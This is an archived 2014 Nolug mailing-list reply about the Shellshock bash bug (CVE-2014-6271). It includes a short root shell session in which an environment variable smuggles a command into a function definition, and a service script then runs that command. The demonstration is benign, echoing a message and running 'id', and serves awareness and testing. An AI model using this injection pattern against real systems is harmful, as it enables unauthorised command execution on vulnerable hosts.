Yeah.... in short....
[root@blah ~]# export G='() { /bin/false; }; echo "[Your shell is vulnerable to
CVE-2014-6271]" ; /usr/bin/id '
[root@blah ~]# /etc/init.d/httpd status
[Your shell is vulnerable to CVE-2014-6271]
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Segmentation fault
[root@blah ~]#
On Wed, Sep 24, 2014 at 6:04 PM, John Souvestre <johns@sstar.com> wrote:
> Hi all.
>
>
>
> US-CERT scored this a 10.0 on a scale of 1 to 10.
>
>
>
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
>
>
>
> John
>
> John Souvestre - New Orleans LA
>
>
-- -Mysid ___________________ Nolug mailing list nolug@nolug.orgReceived on 09/24/14
This archive was generated by hypermail 2.2.0 : 09/25/14 CDT